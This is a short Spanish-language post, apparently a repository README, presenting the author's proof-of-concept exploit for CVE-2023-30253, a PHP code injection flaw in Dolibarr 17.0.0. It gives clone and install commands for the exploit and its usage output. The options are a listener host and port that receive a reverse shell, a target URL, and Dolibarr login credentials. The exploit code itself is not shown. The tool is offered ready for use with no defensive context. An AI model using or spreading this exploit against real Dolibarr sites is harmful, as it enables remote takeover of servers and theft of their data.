
No pude encontrar un PoC para CVE-2023-30253, así que desarrollé uno efectivo
CVE-2023-30253 PoC
Esta es mi PoC para el CVE-2023-30253 (Dolibarr 17.0.0 inyección de código PHP). Cuando el plugin CMS Website (núcleo) está habilitado, un atacante autenticado puede obtener ejecución remota de comandos mediante una inyección de código PHP que evade las restricciones de la aplicación.
Clona el repositorio:
git clone https://github.com/g4nkd/CVE-2023-30253-PoC.git
cd CVE-2023-30253-PoC
pip install -r requirements.txt
python3 exploit.py -h
usage: exploit.py [-h] -lhost LHOST -lport LPORT -rhost RHOST -user USER -pass PASSWORD
Exploit for CVE-2023-30253
options:
-h, --help show this help message and exit
-lhost LHOST Local Host (this host will receive the shell)
-lport LPORT Local PORT
-rhost RHOST Rhost url, example: http://site.com/
-user USER Username for Dolibarr
-pass PASSWORD Password for Dolibarr